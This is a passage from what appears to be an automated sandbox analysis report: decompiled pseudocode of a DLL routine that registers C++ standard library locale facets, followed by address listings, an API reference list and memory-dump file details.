																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6E1E161C(0x6e2c6d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6E2066BA(_t682 - 0x14);
																							return E6E220075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6E2112B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t682 - 0x20);
																									E6E223D74(_t682 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t482, _t641, _t657, 0x14);
																									E6E206653(_t682 - 0x14, 0);
																									_t658 =  *0x6e2c6dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6E1E161C(0x6e2c6d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6E2066BA(_t682 - 0x14);
																										return E6E220075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6E211339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t682 - 0x20);
																												E6E223D74(_t682 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t482, _t642, _t658, 0x14);
																												E6E206653(_t682 - 0x14, 0);
																												_t659 =  *0x6e2c6db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6E1E161C(0x6e2c6d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6E2066BA(_t682 - 0x14);
																													return E6E220075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6E2113A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t682 - 0x20);
																															E6E223D74(_t682 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t482, _t643, _t659, 0x14);
																															E6E206653(_t682 - 0x14, 0);
																															_t660 =  *0x6e2c6ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6E1E161C(0x6e2c6d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6E2066BA(_t682 - 0x14);
																																return E6E220075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6E211409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t682 - 0x20);
																																		E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t482, _t644, _t660, 0x14);
																																		E6E206653(_t682 - 0x14, 0);
																																		_t661 =  *0x6e2c6de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6E1E161C(0x6e2c6d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6E2066BA(_t682 - 0x14);
																																			return E6E220075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6E211471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t682 - 0x20);
																																					E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t482, _t645, _t661, 0x14);
																																					E6E206653(_t682 - 0x14, 0);
																																					_t662 =  *0x6e2c6dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6E1E161C(0x6e2c6da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6E2066BA(_t682 - 0x14);
																																						return E6E220075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6E2114EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t682 - 0x20);
																																								E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t482, _t646, _t662, 0x14);
																																								E6E206653(_t682 - 0x14, 0);
																																								_t663 =  *0x6e2c6dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6E1E161C(0x6e2c6d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6E2066BA(_t682 - 0x14);
																																									return E6E220075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6E211558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t682 - 0x20);
																																											E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t482, _t647, _t663, 0x14);
																																											E6E206653(_t682 - 0x14, 0);
																																											_t664 =  *0x6e2c6e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6E1E161C(0x6e2c6dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6E2066BA(_t682 - 0x14);
																																												return E6E220075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6E2115C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t682 - 0x20);
																																														E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t482, _t648, _t664, 0x14);
																																														E6E206653(_t682 - 0x14, 0);
																																														_t665 =  *0x6e2c6dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6E1E161C(0x6e2c6d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6E2066BA(_t682 - 0x14);
																																															return E6E220075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6E21162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6E1E1438(_t587);
																																																	E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e26851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6e26c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6E21542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6E220075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6E206FD3(__eflags, _t649);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6e2c6dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6E206FD3(__eflags, _t648);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6e2c6e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6E206FD3(__eflags, _t647);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6e2c6dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6E206FD3(__eflags, _t646);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6e2c6dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6E206FD3(__eflags, _t645);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6e2c6de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6E206FD3(__eflags, _t644);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6e2c6ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6E206FD3(__eflags, _t643);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6e2c6db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6E206FD3(__eflags, _t642);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6e2c6dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6E206FD3(__eflags, _t641);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6e2c6dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6E206FD3(__eflags, _t640);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6e2c6dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6E206FD3(__eflags, _t639);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6e2c6df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6E206FD3(__eflags, _t638);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6e2c6df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6E206FD3(__eflags, _t637);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6e2c6dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6E206FD3(__eflags, _t636);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6e2c6df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6E206FD3(__eflags, _t635);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6e2c6dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}



















































                          0x6e20f375
                          0x6e20f375
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3a6
                          0x6e20f3ab
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F37C
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F386
                          • int.LIBCPMT ref: 6E20F39D
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F3D7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F3F7
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F415
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
